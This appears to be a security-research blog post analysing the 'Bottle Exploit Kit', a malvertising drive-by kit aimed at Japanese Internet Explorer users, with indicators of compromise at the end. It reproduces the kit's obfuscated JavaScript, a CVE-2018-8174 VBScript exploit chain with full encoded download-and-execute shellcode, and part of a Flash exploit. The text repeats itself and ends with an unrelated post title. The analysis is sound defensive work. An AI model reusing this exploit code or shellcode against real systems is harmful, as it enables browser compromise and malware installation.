document.body.removeChild(b), q(a) }, b.src = h + (h.indexOf("?") > -1 ? "&" : "?") + "callback=" + d, b.type = "text/javascript", document.body.appendChild(b), f(d, b) } If successful, read the exploit code using the response data. When exploiting the vulnerability of Internet Explorer, read file/vbs.vbs, and when exploiting the vulnerability of Adobe Flash Player, read file/swf.swf. 'success': function (_0x2ad29a) { if (_0x2ad29a[0x1] != '') { if (_0x2956('0x69', '904!') !== _0x2956('0x6a', 'mNBB')) { var _0x5517a0 = document['createElement']('embed'); _0x5517a0['src'] = _0x2ad29a[0x1]; _0x5517a0['setAttribute']('style', 'width:1px; height:1px'); document['body']['appendChild'](_0x5517a0); } else { var _0x33b1ee = cname + '='; var _0x3a1f81 = document['cookie']['split'](';'); for (var _0x2e7aac = 0x0; _0x2e7aac < _0x3a1f81['length']; _0x2e7aac++) { var _0x446c09 = _0x3a1f81[_0x2e7aac]; while (_0x446c09['charAt'](0x0) == ' ') _0x446c09 = _0x446c09['substring'](0x1); if (_0x446c09['indexOf'](_0x33b1ee) != -0x1) return _0x446c09['substring'](_0x33b1ee['length'], _0x446c09['length']); } return ''; } } else if (_0x2ad29a[0x0] != '') { var _0x5a39f4 = document['createElement']('script'); _0x5a39f4['type'] = 'text/vbscript'; _0x5a39f4['src'] = _0x2ad29a[0x0]; document['body']['appendChild'](_0x5a39f4); } } vbs.vbs exploits CVE-2018-8174 and swf.swf exploits CVE-2018-15982. CVE-2018-8174 vbs.vbs is a simple string encoding. Decoding this will give you almost the same code as the PoC. Sub StartExploit UAF InitObjects vb_adrr=LeakVBAddr() vbs_base=GetBaseByDOSmodeSearch(GetUint32(vb_adrr)) msv_base=GetBaseFromImport(vbs_base,"msvcrt.dll") krb_base=GetBaseFromImport(msv_base,"kernelbase.dll") ntd_base=GetBaseFromImport(msv_base,"ntdll.dll") VirtualProtectAddr=GetProcAddr(krb_base,"VirtualProtect") NtContinueAddr=GetProcAddr(ntd_base,"NtContinue") SetMemValue GetShellcode() ShellcodeAddr=GetMemValue()+8 SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr) lIlll=GetMemValue()+69596 SetMemValue ExpandWithVirtualProtect(lIlll) llIIll=GetMemValue() ExecuteShellcode End Sub StartExploit This is the shellcode that is running. Function GetShellcode() IIlI=Unescape("%u0000%u0000%u0000%u0000") &Unescape("%u4cbf%u73d0%udb2c%ud9c5%u2474%u5bf4%uc92b%uc3b1%u7b31%u0313%u137b%uc383%u3248%uc586%ub3ff%u1669%u129b%u1659%u5563%ud61f%u581b%u9794%ue9d7%u03ea%ued6c%u2b61%uaef9%uef65%ueece%ue36d%u2f59%ufcf2%uaf99%u42fa%uac50%uf9c5%ub9e8%u3441%u5399%u928a%u40ea%uf18e%uabfc%ub143%u91b1%uc263%u73c0%ua49c%u7ceb%u2d28%u4338%uee19%u04b5%uc8a6%ub29d%u5eaa%u48ee%ua716%u7468%ua355%u8963%uc79e%u923b%u5373%u8ee3%ue825%uef63%uae42%uec9b%u2c9b%uf16c%u7bfc%ubb1b%uf5f2%ub84e%u407a%u7b84%u3dbf%uf727%u3e7a%u132c%ubd03%uf4e5%u3d85%ufaf6%u84a1%u7100%uf9db%u8555%u4068%u4ea9%ubf2a%u5223%u1b5f%ue940%u64ac%u57cd%u1051%udcdd%u5fad%u25de%u08fd%ufc1f%u5df2%uf0d3%ua6bd%u85a8%u568f%u9ea5%u948e%u177e%u62d5%u6d0b%ucc2e%ua750%ua40d%udbed%uafc3%u23f1%u2fe4%u0ea9%u3bf4%u5177%u067d%uda7b%u7538%u1e4a%u0e97%u22a0%u1df4%u736b%uf652%u8450%uf9a3%u8bed%uc0dd%u7e05%ucce0%u860d%u32e3%u0232%ua7c3%ueacc%ubcc2%ufc37%u3c02%u0238%u3d04%uf9b0%uc72c%u1cd4%u37d0%ua2db%ud8ea%uebae%u89da%ub539%ud51e%ub3e9%ud55a%u8284%u7550%u5c69%ufc9d%u99d0%ub810%u099a%u13d4%u551e%u151c%u5d5b%u539e%u756b%u6290%u7a94%uadac%uc3e3%u2d5b%ud385%u35b3%u1b97%u49bc%u6f51%u4a3e%u1962%u3bcd%ufeda%uef25%u011c%uef4a%u75d6%ue8c8%ufce9%u8023%u0d53%u56ac%uf2a5%ua8d3%u866f%ua351%uee70%uc2bd%u1fc8%u6056%ue02a%u7659%u94e4%u765d%ub77e%ucf28%u2f6a%u2e8f%u506d%uf82f%ue918%ufacc%ud66c%u9c04%ue96e%u622a%u9fb8%ubd93%ue93b%u563f%ue848%u59bf%ud1cd%uf900%u9f58%u5ba4%ue901%u8b66%u169f%ub397%ue836%u4c68%ubcc8%ua0e3%ud249%u39b4%u2b49%u6c66%uc31e%u6e75%uec5f%u7b39%u2d8a%u0946%u5680%u54cb%u6b20%u0608%udfe3%ue269%u88cb%u9901%u8fbb%uadaf%u3f01%u5e1f%u7ab2%uec8f%uf355%ud601%u2fe0%ub634%uaa9e%u0300%u5986%ue7ea%u6545%u2bb1%u1ad0%ub714%u98e5%u5888%u0d84%u602a%ub613%u00c3%u18f5%u98db%u15e1%u528b%u12ce%u7f0e%uf857%u4eac%u5f1f%u4f3f%u7c49%ue640%u4155%u0709%ub995%u0200%u79fd%u3f2c%u86fd%u64e7%u0c16%u6160%uede9%ue470%u2d6c%u098e%ufe91%ub0e2%uaf26%u6a03%uc2b0%u67b9%u5190%u48c4%u95ee%u1838%u2fc9%uea33%ucca3%ucad3%ueb0e%ua64b%u25e4%u0d53%u5ff8%ueb23%u5f00%uff85%ucde8%uffd4%u7c17%uc865%ub8e4%u4127%u82af%u0137%u583f%u2f9b%u9eba%ucfe5%u4e3b%u7597%u3f0b%u302c%u934f%uebcd%u915b%u78f2%uf169%u8b4a%u016d%uda54%uea49%ub067%u691c%uc9b7%u8de1%uc968%u6a4b%u6bd6%u4328%u5f2b%ueb9a%ufa15%u135a%u8446%u4bf2%u3644%uf808%u2d83%ua621%u871f%u46da%u4625%u4dd5%uae62%u62cf%u23b9%u8f5f%u0d88%u0f0c%uce77%u67c1%u4614%u0844%u868d%u84e2%ud721%u3dbd%ubed4%udb2f%u6f5c%u4fcb%u6ff1%ue246%u1d65%u6c07%ub958%u1cbb%u15a4%u9006%u95f4" &lIIII(IIIII(""))) IIlI=IIlI & String((&h80000-LenB(IIlI))/2,Unescape("%u4141")) GetShellcode=IIlI End Function CVE-2018-15982 swf.swf is almost the same as PoC. package { import com.adobe.tvsdk.mediacore.metadata.Metadata; import flash.display.Sprite; import flash.events.Event; import flash.net.LocalConnection; import flash.system.Capabilities; import flash.utils.ByteArray; import flash.utils.Endian; public class Main extends Sprite { The executed shellcode is the same as CVE-2018-8174. Shellcode The shellcode downloads and executes malware just like other EKs. The malware is not encrypted. The shellcode was encoded by Shikata Ga Nai Encoder. The decoded shellcode is a simple code that downloads and executes a malwre. The list of APIs to use is as follows: The API hashing algorithm is imul83hAdd. Interestingly, the URL string of the download destination was created as a mutex. The malware is created as svchost.exe in% temp% and then executed with the WinExe function. Malware The malware is probably unique. We have never seen this elsewhere. According to my friend @VK_Intel, this could be a stealer targeting Japan. These are the characteristics of this malware. Check if Japanese environment using GetUserDefaultUILanguage Download and use unzip.exe from these websites ftp://ftp.cadwork.ch/DVD_V20/cadwork.dir/COM/unzip.exe ftp://freddy-ru.starlink.ru/ckJlag/antivir/SDFix/apps/unzip.exe ftp://ftp.cadwork.ch/DVD_V20/cadwork.dir/COM/unzip.exe Download and use Tor https://archive.torproject.org/tor-package-archive/torbrowser/8.0.8/tor-win32-0.3.5.8.zip C2 [POST] 5frjkvw2w3wv6dnv.onion/conn.php [GET] 5frjkvw2w3wv6dnv.onion/rd.php [POST] 4w6ylniamu6x7e3a.onion/connect.php User-Agent is Mozilla/5.0 (Windows NT 6.1; WOW64) Main file location %temp% C:\Users\Public Finally Bottle Exploit Kit is an exploit kit targeting Japan. It’s not as sophisticated as the Exploit Kit, but JavaScript is elaborate. It has been observed for at least three months ago, and its activity continues today. The vulnerabilities it exploits are the same as other EKs. The same should be noted. Keep an eye on trend of it. Many people helped with our research. Special thanks to @kafeine and @VK_Intel. IOC BottleEK Traffic priv.inteleksys.com (139.180.136.22) / /file/style.css /file/ajax.min.js /file/main.js /file/1.gif /conn.php /file/vbs.vbs /file/swf.swf sales.inteleksys.com (139.99.115.204) Hash main.js 588bb25acf86ac18323d800372bbdc0eb89ba3ce80ed3d891a9c41b8db93df26 1.gif f89a8cc4dee2ac551380d0ecf5ee2d6dc2d2be20bb1929599a23edf79d8ed127 vbs.vbs 0afe359d9659f9d43a737bf2e1fcbe4d7e216fee3085cad153a4548785bb0166 swf.swf 340bfa57fafda31843588619cf505d08bdf41b6c3caf0df2b3b260473f3768d1 Malware Traffic https://archive.torproject.org/tor-package-archive/torbrowser/8.0.8/tor-win32-0.3.5.8.zip 5frjkvw2w3wv6dnv.onion /conn.php /rd.php 4w6ylniamu6x7e3a.onion /connect.php Hash Malware 914eb64b93cbb631c710ef6cbd0f9cedf93415be421ccc6e285b288b87f3a246 c1b67a30119107365c4a311479794e07afb631980a649749501cb9f511fb0ab4 DLL 7d6823211590d0c9beffb964051ff0638e3e00beae3274733a6ccdf5c41fdede 6625c178cc56184a1d8f8d0cbabff3abcc90820cd158b5860b10d6196d606a82

<h2 id="first">First</h2> On December 11, 2019, we were strolling through ad-networks. As before, we observed RIG, Fallout and Underminer Exploit Kit, but observed other interesting Drive-by Download attack. We call it “Bottle Exploit Kit”. BottleEK targets only Japanese users. According to our research, BottleEK has been active at least in September 2019. This time we introduce BottleEK. <img src="https://nao-sec.org/assets/2019-12-13/0.gif" alt="" /> Sample traffic data is <a href="https://www.virustotal.com/gui/file/5195da2b95ec7b13876ccca113cf6816146788fddbe99f16e3cb6af34f6c0822/detection">here</a>. <h2 id="traffic">Traffic</h2> <img src="https://nao-sec.org/assets/2019-12-13/1.png" alt="" /> We have confirmed that we are redirected to BottleEK by malvertising. When you are redirected from ad-network to BottleEK, the landing page html is loaded first. The landing page loads two JavaScipt files. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><!doctype html> <html lang="ja"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=10"> <meta http-equiv="Expires" content="0"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Cache" content="no-cache"> <link href="file/style.css" rel="stylesheet" type="text/css"/> </head> <body style="background-color: #F4F4F4;font-family:MS PGothic,Arial,Hiragino Kaku Gothic ProN,Osaka,sans-serif"> <div id="main" class="main"></div> <script type="text/javascript" src="file/ajax.min.js"></script> <script type="text/javascript" src="file/main.js"></script> </body> </html> </code></pre></div></div> “ajax.min.js” is a JavaScript file for communication. It is used once to get the exploit code URL. Since it’s not important, we will omit it this time. Please remember only this code. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>function e() { var b = document.createElement("script"), c = (new Date).getTime() + Math.round(1e3 * Math.random()), d = "JSONP_" + c; a[d] = function (a) { clearTimeout(s), document.body.removeChild(b), q(a) }, b.src = h + (h.indexOf("?") > -1 ? "&" : "?") + "callback=" + d, b.type = "text/javascript", document.body.appendChild(b), f(d, b) } </code></pre></div></div> Next, let’s read “main.js”. This file contains obfuscation, debug detection and environment detection.　Reading everything is not easy… First, a large array is defined. This looks like a Base64 string, but base64_decode doesn’t make any meaningful data. To decrypt this, you need to read two processes. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var _0x1d5a = ['bsK+BcOlwpXCmg==', 'OsKhwoIKb8OOwrHDsMOvEcOHw4Fn', 'ZMKfw6Fqw5R0', 'T1xqw70=', ... </code></pre></div></div> The first process is to swap the order of the arrays. This is code like this: <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var _0x5906e4 = function (_0x35d916) { while (--_0x35d916) { _0x4480b8['push'](_0x4480b8['shift']()); } }; /* --- Snip --- */ var _0x29fbca = { 'getCookie': function (_0xa8b74, _0x1731ce) { _0xa8b74 = _0xa8b74 || function (_0x1e7379) { return _0x1e7379; }; var _0x36cf86 = _0xa8b74(new RegExp('(?:^|;\x20)' + _0x1731ce['replace'](/([.$?*|{}()[]\/+^])/g, '$1') + '=([^;]*)')); var _0x3ff1ff = function (_0xf3a699, _0x2d4894) { _0xf3a699(++_0x2d4894); }; _0x3ff1ff(_0x5906e4, _0x3c6c93); return _0x36cf86 ? decodeURIComponent(_0x36cf86[0x1]) : undefined; } } _0x29fbca['getCookie'](null, 'counter'); </code></pre></div></div> Next, the array data with the order changed is decoded. This is the code for decryption. A combination of Base64, URL Encode and RC4. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var decode = function (enc_data, key) { var a = [], b = 0, c, d = '', e = ''; enc_data = atob(enc_data); for (var i = 0, length = enc_data['length']; i < length; i++) { e += '%' + ('00' + enc_data['charCodeAt'](i)['toString'](16))['slice'](-2); } enc_data = decodeURIComponent(e); for (var i = 0; i < 256; i++) { a[i] = i; } /* RC4 */ for (i = 0; i < 256; i++) { b = (b + a[i] + key['charCodeAt'](i % key['length'])) % 256; c = a[i]; a[i] = a[b]; a[b] = c; } i = 0; b = 0; for (var j = 0; j < enc_data['length']; j++) { i = (i + 1) % 256; b = (b + a[i]) % 256; c = a[i]; a[i] = a[b]; a[b] = c; d += String['fromCharCode'](enc_data['charCodeAt'](j) ^ a[(a[i] + a[b]) % 256]); } return d; }; </code></pre></div></div> This decrypts the array data and executes the main process. First, check that <code class="language-plaintext highlighter-rouge">username</code> is set in the cookie. If it is set, processing ends. If not, set cookie <code class="language-plaintext highlighter-rouge">username=bingv</code> and the attack will continue. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var user = getCookie('username'); if (user == '') { setCookie('username', 'bingv', 0x1); </code></pre></div></div> Next, check user environment. This is one of the most characteristic codes of the Bottle Exploit Kit. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var chk = checkEnv(); </code></pre></div></div> <code class="language-plaintext highlighter-rouge">checkEnv</code> gets the browser language setting. If it is not Japanese, display a dummy html and end. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>function checkEnv() { var _0x4db42a = (navigator['language'] || navigator['browserLanguage'])['toLowerCase'](); if (_0x4db42a['indexOf']('ja') == -0x1) return 0x0; </code></pre></div></div> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>document['getElementById']('main')['innerHTML'] = "<h1>Customer Login</h1><form><input type='text'value='User'><input type='password'><input type='submit'value='Submit'></form>"; </code></pre></div></div> And, browser information is acquired by User-Agent. If it is not Internet Explorer, display a dummy html and end in the same way. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var _0x100f15 = navigator['userAgent']; var _0xed2c96 = _0x100f15['indexOf']('compatible') > -0x1 && _0x100f15['indexOf']('MSIE') > -0x1; var _0x4d34a9 = _0x100f15['indexOf']('Trident') > -0x1 && _0x100f15['indexOf']('rv:11.0') > -0x1; if (_0xed2c96) { if (_0x2956('0x43', '^eQ7') !== _0x2956('0x44', '4@%$')) { var _0x41dde8 = new RegExp("MSIE (\d+\.\d+);"); _0x41dde8['test'](_0x100f15); var _0x50d3cb = parseFloat(RegExp['$1']); return _0x50d3cb; } else { _0x53ccba(this, function () { var _0x2e6966 = new RegExp("function *$ *$"); var _0xdc7ac8 = new RegExp("\+\+ *(?:_0x(?:[a-f0-9]){4,6}|(?:\b|\d)[a-z0-9]{1,4}(?:\b|\d))", 'i'); var _0x4fc827 = _0x118083('init'); if (!_0x2e6966['test'](_0x4fc827 + 'chain') || !_0xdc7ac8['test'](_0x4fc827 + 'input')) { _0x4fc827('0'); } else { _0x118083(); } })(); } </code></pre></div></div> If these checks are passed, the image is displayed. The <code class="language-plaintext highlighter-rouge">1.gif</code> used at this time is an image of the bottle. The <code class="language-plaintext highlighter-rouge">str1</code> displayed below the image is Japanese. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var str1 = '読み込み中。。。お待ちください&nbsp;&nbsp;&nbsp;&nbsp;'; /* --- Snip --- */ if (chk > 0x0) { var myimg = document['createElement']('img'); myimg['setAttribute']('id', 'ldimg'); myimg['setAttribute']('style', 'position:absolute;width:40%;left:30%;height:40%; top:20%; z-index: 10;display:inline'); myimg['setAttribute']('src', 'file/1.gif'); document['body']['appendChild'](myimg); var myp = document['createElement']('p'); myp['setAttribute']('id', 'ldpr'); myp['setAttribute']('style', 'font-size:30px; position:absolute; left:5%; text-align:center; height:10%; top:60%; width:90%; z-index:10;'); document['body']['appendChild'](myp); for (var i = 0x0; i <= LOAD_SECOND; i++) { var progress = Math['round'](i * 0x64 / LOAD_SECOND); (function (_0x368e63) { setTimeout(function () { change_progress(_0x368e63, str1); }, i * 0x3e8); }(progress)); } </code></pre></div></div> <img src="https://nao-sec.org/assets/2019-12-13/2.png" alt="" /> And it gets the exploit code. Three parameters are used at that time. <ol> <li>Internet Explorer version</li> <li>is 64bit</li> <li>Adobe Flash Player version</li> </ol> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var is64 = 0x0; if (navigator['platform']['indexOf']('64') != -0x1) is64 = 0x1; var fls = flashChecker(); ajax({ 'type': 'GET', 'dataType': 'jsonp', 'timeOut': 0x2710, 'url': '/conn.php?callback=?', 'data': { 'data1': chk, 'data2': is64, 'data3': fls['v'] }, </code></pre></div></div> When send this request, use the <code class="language-plaintext highlighter-rouge">ajax.min.js</code> you read earlier. Therefore, <code class="language-plaintext highlighter-rouge">callback</code> is added at the end. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>function e() { var b = document.createElement("script"), c = (new Date).getTime() + Math.round(1e3 * Math.random()), d = "JSONP_" + c; a[d] = function (a) { clearTimeout(s), document.body.removeChild(b), q(a) }, b.src = h + (h.indexOf("?") > -1 ? "&" : "?") + "callback=" + d, b.type = "text/javascript", document.body.appendChild(b), f(d, b) } </code></pre></div></div> If successful, read the exploit code using the response data. When exploiting the vulnerability of Internet Explorer, read <code class="language-plaintext highlighter-rouge">file/vbs.vbs</code>, and when exploiting the vulnerability of Adobe Flash Player, read<code class="language-plaintext highlighter-rouge"> file/swf.swf</code>. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>'success': function (_0x2ad29a) { if (_0x2ad29a[0x1] != '') { if (_0x2956('0x69', '904!') !== _0x2956('0x6a', 'mNBB')) { var _0x5517a0 = document['createElement']('embed'); _0x5517a0['src'] = _0x2ad29a[0x1]; _0x5517a0['setAttribute']('style', 'width:1px; height:1px'); document['body']['appendChild'](_0x5517a0); } else { var _0x33b1ee = cname + '='; var _0x3a1f81 = document['cookie']['split'](';'); for (var _0x2e7aac = 0x0; _0x2e7aac < _0x3a1f81['length']; _0x2e7aac++) { var _0x446c09 = _0x3a1f81[_0x2e7aac]; while (_0x446c09['charAt'](0x0) == ' ') _0x446c09 = _0x446c09['substring'](0x1); if (_0x446c09['indexOf'](_0x33b1ee) != -0x1) return _0x446c09['substring'](_0x33b1ee['length'], _0x446c09['length']); } return ''; } } else if (_0x2ad29a[0x0] != '') { var _0x5a39f4 = document['createElement']('script'); _0x5a39f4['type'] = 'text/vbscript'; _0x5a39f4['src'] = _0x2ad29a[0x0]; document['body']['appendChild'](_0x5a39f4); } } </code></pre></div></div> <code class="language-plaintext highlighter-rouge">vbs.vbs</code> exploits CVE-2018-8174 and <code class="language-plaintext highlighter-rouge">swf.swf</code> exploits CVE-2018-15982. <h3 id="cve-2018-8174">CVE-2018-8174</h3> <code class="language-plaintext highlighter-rouge">vbs.vbs</code> is a simple string encoding. Decoding this will give you almost the same code as the PoC. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Sub StartExploit UAF InitObjects vb_adrr=LeakVBAddr() vbs_base=GetBaseByDOSmodeSearch(GetUint32(vb_adrr)) msv_base=GetBaseFromImport(vbs_base,"msvcrt.dll") krb_base=GetBaseFromImport(msv_base,"kernelbase.dll") ntd_base=GetBaseFromImport(msv_base,"ntdll.dll") VirtualProtectAddr=GetProcAddr(krb_base,"VirtualProtect") NtContinueAddr=GetProcAddr(ntd_base,"NtContinue") SetMemValue GetShellcode() ShellcodeAddr=GetMemValue()+8 SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr) lIlll=GetMemValue()+69596 SetMemValue ExpandWithVirtualProtect(lIlll) llIIll=GetMemValue() ExecuteShellcode End Sub StartExploit </code></pre></div></div> This is the shellcode that is running. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Function GetShellcode() IIlI=Unescape("%u0000%u0000%u0000%u0000") &Unescape("%u4cbf%u73d0%udb2c%ud9c5%u2474%u5bf4%uc92b%uc3b1%u7b31%u0313%u137b%uc383%u3248%uc586%ub3ff%u1669%u129b%u1659%u5563%ud61f%u581b%u9794%ue9d7%u03ea%ued6c%u2b61%uaef9%uef65%ueece%ue36d%u2f59%ufcf2%uaf99%u42fa%uac50%uf9c5%ub9e8%u3441%u5399%u928a%u40ea%uf18e%uabfc%ub143%u91b1%uc263%u73c0%ua49c%u7ceb%u2d28%u4338%uee19%u04b5%uc8a6%ub29d%u5eaa%u48ee%ua716%u7468%ua355%u8963%uc79e%u923b%u5373%u8ee3%ue825%uef63%uae42%uec9b%u2c9b%uf16c%u7bfc%ubb1b%uf5f2%ub84e%u407a%u7b84%u3dbf%uf727%u3e7a%u132c%ubd03%uf4e5%u3d85%ufaf6%u84a1%u7100%uf9db%u8555%u4068%u4ea9%ubf2a%u5223%u1b5f%ue940%u64ac%u57cd%u1051%udcdd%u5fad%u25de%u08fd%ufc1f%u5df2%uf0d3%ua6bd%u85a8%u568f%u9ea5%u948e%u177e%u62d5%u6d0b%ucc2e%ua750%ua40d%udbed%uafc3%u23f1%u2fe4%u0ea9%u3bf4%u5177%u067d%uda7b%u7538%u1e4a%u0e97%u22a0%u1df4%u736b%uf652%u8450%uf9a3%u8bed%uc0dd%u7e05%ucce0%u860d%u32e3%u0232%ua7c3%ueacc%ubcc2%ufc37%u3c02%u0238%u3d04%uf9b0%uc72c%u1cd4%u37d0%ua2db%ud8ea%uebae%u89da%ub539%ud51e%ub3e9%ud55a%u8284%u7550%u5c69%ufc9d%u99d0%ub810%u099a%u13d4%u551e%u151c%u5d5b%u539e%u756b%u6290%u7a94%uadac%uc3e3%u2d5b%ud385%u35b3%u1b97%u49bc%u6f51%u4a3e%u1962%u3bcd%ufeda%uef25%u011c%uef4a%u75d6%ue8c8%ufce9%u8023%u0d53%u56ac%uf2a5%ua8d3%u866f%ua351%uee70%uc2bd%u1fc8%u6056%ue02a%u7659%u94e4%u765d%ub77e%ucf28%u2f6a%u2e8f%u506d%uf82f%ue918%ufacc%ud66c%u9c04%ue96e%u622a%u9fb8%ubd93%ue93b%u563f%ue848%u59bf%ud1cd%uf900%u9f58%u5ba4%ue901%u8b66%u169f%ub397%ue836%u4c68%ubcc8%ua0e3%ud249%u39b4%u2b49%u6c66%uc31e%u6e75%uec5f%u7b39%u2d8a%u0946%u5680%u54cb%u6b20%u0608%udfe3%ue269%u88cb%u9901%u8fbb%uadaf%u3f01%u5e1f%u7ab2%uec8f%uf355%ud601%u2fe0%ub634%uaa9e%u0300%u5986%ue7ea%u6545%u2bb1%u1ad0%ub714%u98e5%u5888%u0d84%u602a%ub613%u00c3%u18f5%u98db%u15e1%u528b%u12ce%u7f0e%uf857%u4eac%u5f1f%u4f3f%u7c49%ue640%u4155%u0709%ub995%u0200%u79fd%u3f2c%u86fd%u64e7%u0c16%u6160%uede9%ue470%u2d6c%u098e%ufe91%ub0e2%uaf26%u6a03%uc2b0%u67b9%u5190%u48c4%u95ee%u1838%u2fc9%uea33%ucca3%ucad3%ueb0e%ua64b%u25e4%u0d53%u5ff8%ueb23%u5f00%uff85%ucde8%uffd4%u7c17%uc865%ub8e4%u4127%u82af%u0137%u583f%u2f9b%u9eba%ucfe5%u4e3b%u7597%u3f0b%u302c%u934f%uebcd%u915b%u78f2%uf169%u8b4a%u016d%uda54%uea49%ub067%u691c%uc9b7%u8de1%uc968%u6a4b%u6bd6%u4328%u5f2b%ueb9a%ufa15%u135a%u8446%u4bf2%u3644%uf808%u2d83%ua621%u871f%u46da%u4625%u4dd5%uae62%u62cf%u23b9%u8f5f%u0d88%u0f0c%uce77%u67c1%u4614%u0844%u868d%u84e2%ud721%u3dbd%ubed4%udb2f%u6f5c%u4fcb%u6ff1%ue246%u1d65%u6c07%ub958%u1cbb%u15a4%u9006%u95f4" &lIIII(IIIII(""))) IIlI=IIlI & String((&h80000-LenB(IIlI))/2,Unescape("%u4141")) GetShellcode=IIlI End Function </code></pre></div></div> <h3 id="cve-2018-15982">CVE-2018-15982</h3> <code class="language-plaintext highlighter-rouge">swf.swf</code> is almost the same as PoC. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>package { import com.adobe.tvsdk.mediacore.metadata.Metadata; import flash.display.Sprite; import flash.events.Event; import flash.net.LocalConnection; import flash.system.Capabilities; import flash.utils.ByteArray; import flash.utils.Endian; public class Main extends Sprite { </code></pre></div></div> The executed shellcode is the same as CVE-2018-8174. <h2 id="shellcode">Shellcode</h2> The shellcode downloads and executes malware just like other EKs. The malware is not encrypted. The shellcode was encoded by Shikata Ga Nai Encoder. <img src="https://nao-sec.org/assets/2019-12-13/3.png" alt="" /> The decoded shellcode is a simple code that downloads and executes a malwre. The list of APIs to use is as follows: <img src="https://nao-sec.org/assets/2019-12-13/4.png" alt="" /> The API hashing algorithm is imul83hAdd. <img src="https://nao-sec.org/assets/2019-12-13/5.png" alt="" /> Interestingly, the URL string of the download destination was created as a mutex. <img src="https://nao-sec.org/assets/2019-12-13/6.png" alt="" /> The malware is created as svchost.exe in% temp% and then executed with the WinExe function. <img src="https://nao-sec.org/assets/2019-12-13/7.png" alt="" /> <h2 id="malware">Malware</h2> The malware is probably unique. We have never seen this elsewhere. According to my friend <a href="https://twitter.com/VK_Intel">@VK_Intel</a>, this could be a stealer targeting Japan. These are the characteristics of this malware. <ul> <li>Check if Japanese environment using GetUserDefaultUILanguage</li> <li>Download and use unzip.exe from these websites <ul> <li>ftp://ftp.cadwork.ch/DVD_V20/cadwork.dir/COM/unzip.exe</li> <li>ftp://freddy-ru.starlink.ru/ckJlag/antivir/SDFix/apps/unzip.exe</li> <li>ftp://ftp.cadwork.ch/DVD_V20/cadwork.dir/COM/unzip.exe</li> </ul> </li> <li>Download and use Tor <ul> <li>https://archive.torproject.org/tor-package-archive/torbrowser/8.0.8/tor-win32-0.3.5.8.zip</li> </ul> </li> <li>C2 <ul> <li>[POST] 5frjkvw2w3wv6dnv.onion/conn.php</li> <li>[GET] 5frjkvw2w3wv6dnv.onion/rd.php</li> <li>[POST] 4w6ylniamu6x7e3a.onion/connect.php <ul> <li>User-Agent is <code class="language-plaintext highlighter-rouge">Mozilla/5.0 (Windows NT 6.1; WOW64)</code></li> </ul> </li> </ul> </li> <li>Main file location <ul> <li>%temp%</li> <li><code class="language-plaintext highlighter-rouge">C:\Users\Public</code></li> </ul> </li> </ul> <h2 id="finally">Finally</h2> Bottle Exploit Kit is an exploit kit targeting Japan. It’s not as sophisticated as the Exploit Kit, but JavaScript is elaborate. It has been observed for at least three months ago, and its activity continues today. The vulnerabilities it exploits are the same as other EKs. The same should be noted. Keep an eye on trend of it. Many people helped with our research. Special thanks to <a href="https://twitter.com/kafeine">@kafeine</a> and <a href="https://twitter.com/VK_Intel">@VK_Intel</a>. <h2 id="ioc">IOC</h2> <ul> <li>BottleEK <ul> <li>Traffic <ul> <li>priv.inteleksys.com (139.180.136.22) <ul> <li>/</li> <li>/file/style.css</li> <li>/file/ajax.min.js</li> <li>/file/main.js</li> <li>/file/1.gif</li> <li>/conn.php</li> <li>/file/vbs.vbs</li> <li>/file/swf.swf</li> </ul> </li> <li>sales.inteleksys.com (139.99.115.204)</li> </ul> </li> <li>Hash <ul> <li>main.js <ul> <li>588bb25acf86ac18323d800372bbdc0eb89ba3ce80ed3d891a9c41b8db93df26</li> </ul> </li> <li>1.gif <ul> <li>f89a8cc4dee2ac551380d0ecf5ee2d6dc2d2be20bb1929599a23edf79d8ed127</li> </ul> </li> <li>vbs.vbs <ul> <li>0afe359d9659f9d43a737bf2e1fcbe4d7e216fee3085cad153a4548785bb0166</li> </ul> </li> <li>swf.swf <ul> <li>340bfa57fafda31843588619cf505d08bdf41b6c3caf0df2b3b260473f3768d1</li> </ul> </li> </ul> </li> </ul> </li> <li>Malware <ul> <li>Traffic <ul> <li>https://archive.torproject.org/tor-package-archive/torbrowser/8.0.8/tor-win32-0.3.5.8.zip</li> <li>5frjkvw2w3wv6dnv.onion <ul> <li>/conn.php</li> <li>/rd.php</li> </ul> </li> <li>4w6ylniamu6x7e3a.onion <ul> <li>/connect.php</li> </ul> </li> </ul> </li> <li>Hash <ul> <li>Malware <ul> <li>914eb64b93cbb631c710ef6cbd0f9cedf93415be421ccc6e285b288b87f3a246</li> <li>c1b67a30119107365c4a311479794e07afb631980a649749501cb9f511fb0ab4</li> </ul> </li> <li>DLL <ul> <li>7d6823211590d0c9beffb964051ff0638e3e00beae3274733a6ccdf5c41fdede</li> <li>6625c178cc56184a1d8f8d0cbabff3abcc90820cd158b5860b10d6196d606a82</li> </ul> </li> </ul> </li> </ul> </li> </ul>
Weak Drive-by Download attack with “Radio Exploit Kit”

Mon, 15 Jul 2019 15:00:00 -0000

